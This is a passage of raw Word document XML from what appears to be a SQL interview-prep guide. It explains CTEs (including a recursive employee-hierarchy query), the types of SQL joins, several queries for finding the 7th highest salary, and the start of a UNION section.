    <w:p w14:paraId="7C87E0CD"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F314B">
          <v:rect id="_x0000_i3219" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C80ABE"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Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C50CEA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cte_name AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331495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column1, column2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C8032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some_table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2DE48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condition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA413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79DA75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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6628B30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FROM cte_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4269F7C1"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2E596">
          <v:rect id="_x0000_i3220" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76526E84"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Key Points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5366C22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Defined using WITH keyword.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28322F5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Acts like a temporary named result set (similar to a view but not stored).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284F4E7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Improves readability and modularity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0582CD2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Can be </w:t>
      </w:r>
      <w:r w:rsidRPr="008503FD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>recursive</w:t>
      </w:r>
      <w:r w:rsidRPr="008503FD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (used for hierarchical data like trees).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06043BEA"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CE7A8A">
          <v:rect id="_x0000_i3221" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7B3A13"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Simple CTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716FE256"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HighSalaryEmployees AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4AEBC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name, salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11436EA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62F9F72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salary &gt; 5000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8A98B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21245C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HighSalaryEmployees;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320BC932"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3FF22D">
          <v:rect id="_x0000_i3222" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09325E35"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Recursive CTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C54BEF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Used to get a hierarchy, like manager-employee chains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2EED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RECURSIVE EmployeeHierarchy AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4569D7F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id, name, manager_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088DF94B"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49A16353"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manager_id IS NULL  -- top-level boss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6C4004" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06E0C3A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UNION ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BDB9B9" w14:textId="77777777" w:rsidR="008503FD" w:rsidRPr="008503FD" w:rsidRDefault="008503FD" w:rsidP="008503FD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="448ADDE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e.id, e.name, e.manager_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E70A05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 e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C4223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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    JOIN EmployeeHierarchy eh ON e.manager_id = eh.id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6268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6606C7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EmployeeHierarchy;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0AC831" w14:textId="41A22129" w:rsidR="003F368A" w:rsidRPr="00DA67E8"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FF9FCC">
          <v:rect id="_x0000_i3223" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7106F9FD" w14:textId="27BC9EE9" w:rsidR="00296A28" w:rsidRPr="00CE4B95" w:rsidRDefault="0014590E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="767" w:name="_Toc197867981"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of join</w:t>
      </w:r>
      <w:r w:rsidR="00296A28" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="767"/>
    </w:p>
    <w:p w14:paraId="2261F6CD" w14:textId="110D2088" w:rsidR="000B4C26" w:rsidRPr="00393B05" w:rsidRDefault="000B4C26" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:num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se of Joins in SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2345E8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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>join</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Joins are Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609E588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trieve Related Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In relational databases, data is usually stored in different tables, each focusing on a specific aspect of the system. Joins allow you to combine data from multiple tables based on their relationships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B6691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Data Redundancy</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Instead of repeating information in each table, joins allow you to store data in separate, normalized tables and then fetch it together when needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EA667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Aggregation</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Joins help in aggregating data from multiple sources, such as calculating the total salary of employees grouped by department, or finding orders placed by customers in a specific region.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086A4F5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 Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When used properly, joins can allow for efficient data retrieval. Instead of querying each table individually and processing the results, you can combine data from multiple tables in a single query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717230C4"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44C5B49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6FAD88D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both tables. If there is no match, the row is excluded from the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F66F88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only want to return rows that have matching records in both tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C59C9E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BA49CC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751F7F0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458BF0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA646A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64F0D126"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who are associated with a department.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05949B6A"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LEFT OUTER JOIN)</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311AE79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all rows from the left table (first table), and the matched rows from the right table (second table). If no match is found, the result will contain NULL for columns from the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703404B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left table, even if there is no corresponding match in the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A4DCE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DBB8B9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EE8165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8AE280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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C426A4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4AF35E63"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even those who are not assigned to any department. If there's no match for a department, the department_name will be NULL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7578D1E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RIGHT OUTER JOIN)</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3719983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Similar to a LEFT JOIN, but it returns all rows from the right table and the matching rows from the left table. If no match is found, the result will contain NULL for columns from the left table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF1FF7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right table, even if there is no corresponding match in the left table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE1CDD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AA1D2A0"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4D19F5B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77F4C3D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040A4F8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1A998C8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departments, even those that do not have any employees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB1613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FULL OUTER JOIN)</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EABDE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scription</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns rows when there is a match in either the left or the right table. If there is no match, NULL values will appear for the columns of the table that has no match.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2284926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return all records from both tables, with NULL for non-matching rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F21FF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DC0FB5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5F76B2F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BD55D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659339A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5C188580"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and all departments. Employees who don't belong to a department and departments without employees will have NULL values in the corresponding columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C66FA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5EB6C9B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the Cartesian product of the two tables, i.e., it joins every row from the first table with every row from the second table. It is usually used for creating combinations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2566309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Rarely used, but useful for generating combinations of rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C634EB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8CFF3AF"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0CC470A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231FC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4986A5A1"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possible combinations of employees and projects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8CDBE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDCA1D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A self join is a join where a table is joined with itself. This is useful when a table has a hierarchical relationship or when you need to compare rows within the same table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E39205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compare rows within the same table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309AEA7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21EC4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1.employee_name, e2.employee_name AS manager_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A71AB0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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BBA3A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 employees e2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A81412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1.manager_id = e2.employee_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BACB9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and their managers from the same employees table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6492C2"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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295EED0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allow you to combine related data across multiple tables, making your queries more efficient and reducing redundancy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B7E32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ype of join you use depends on your requirements for which records you want to retrieve:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E91750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Only matched records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D437A0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w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: All records from the left table, and matching records from the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ADAC1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w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: All records from the right table, and matching records from the left table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF119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w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: All records from both tables, with NULLs for non-matching records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4442D32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 Cartesian product (all possible combinations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AB5E5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 A table joined with itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134E8A3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derstanding joins and how they work is crucial for efficiently querying relational databases, especially when the data is normalized and spread across multiple related tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028A7200" w14:textId="1D3942E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3224" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD4A20D" w14:textId="0E898CF3" w:rsidR="00296A28" w:rsidRPr="00CE4B95" w:rsidRDefault="00C2348B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="768" w:name="_Toc197867982"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="000B4C26"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0B4C26"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7th highest salary of an employee</w:t>
      </w:r>
      <w:r w:rsidR="00296A28" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="768"/>
    </w:p>
    <w:p w14:paraId="71BC6457" w14:textId="3FF96F45" w:rsidR="00AF73EB" w:rsidRPr="00393B05" w:rsidRDefault="00AF73EB" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>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o retrieve the </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7th highest salary</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the employee table, you can use a combination of </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DISTINCT</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LIMIT/ROW_NUMBER()</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (depending on your SQL flavor). Here's how you can do it for different SQL databases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63625B42"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1: Using LIMIT (for MySQL, PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F53E45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are using MySQL or PostgreSQL, you can use the LIMIT and OFFSET clauses to skip the first 6 records and return the 7th record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606BD6F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DISTINCT salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24238BA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02B0E35B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570EC631"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD61F1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6D74A028"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Orders the salaries in descending order, so the highest salary comes first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E310BDA"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LIMIT 1 OFFSET 6: Skips the first 6 records and fetches the next one, which will be the 7th highest salary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA084A3"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2: Using ROW_NUMBER() (for SQL Server, Oracle, PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0D1DE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databases like SQL Server or Oracle that support window functions, you can use ROW_NUMBER() to assign a rank to each salary, then filter the 7th highest salary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71412C1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C44597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ROW_NUMBER() OVER (ORDER BY salary DESC) AS rank</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152953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6D862E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4FAFD853"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280AC1F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3FC0FE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6A01634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24B758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ROW_NUMBER() function generates a unique row number for each record based on the order of the salary in descending order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E9E111"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WHERE rank = 7 filters the result to return only the 7th highest salary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6C1528"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3: Using DENSE_RANK() (for SQL Server, PostgreSQL, Oracle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03745A0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have duplicate salaries and you want to get the 7th highest distinct salary, you can use DENSE_RANK() to rank salaries without skipping any ranks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AF79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3CB152A"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DENSE_RANK() OVER (ORDER BY salary DESC) AS rank</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F7DDB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4000F60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7FEAD70F"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6F495D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6C91E58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3420530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71DF04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SE_RANK() will rank rows without skipping ranks even if there are ties. For example, if two employees have the same salary as the 2nd highest, the next salary will be ranked as 3rd, not 4th.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3298EC74"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4: Using Subquery (for any SQL database)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB3EB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nother universal approach is to use a subquery to get the 7th highest salary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24547FD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MAX(salary) AS 7th_highest_salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B93E89"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55A0E90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salary NOT IN (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1918BAE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FROM employee ORDER BY salary DESC LIMIT 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C66E4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2B81958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25512512"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subquery fetches the top 6 highest salaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3507E7A6"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main query finds the maximum salary that is not in the list of top 6, which will give the 7th highest salary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4EA96B" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="00393B0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3B8078">
          <v:rect id="_x0000_i3225" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C626B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hoose the appropriate method based on the SQL database you are using. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ROW_NUMBER()</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ENSE_RANK()</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> methods are particularly useful when you need to handle ties in the salary values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E4F92B" w14:textId="162222B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3226" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4301B3" w14:textId="60C5A486" w:rsidR="001D73F8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D171E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="769" w:name="_Toc197867983"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Union in SQL</w:t>
      </w:r>
      <w:r w:rsidR="001D73F8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="769"/>
    </w:p>
    <w:p w14:paraId="17589949" w14:textId="4EE66B9A" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00393B0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hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00AF73EB" w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">n SQL, </w:t>
      </w:r>
      <w:r w:rsidR="00AF73EB" w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidR="00AF73EB" w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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UNION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B13E1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Compatibility</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA8983A"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SELECT statement in the UNION must have the same number of columns and corresponding columns must have compatible data types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E4E40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 Removal</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
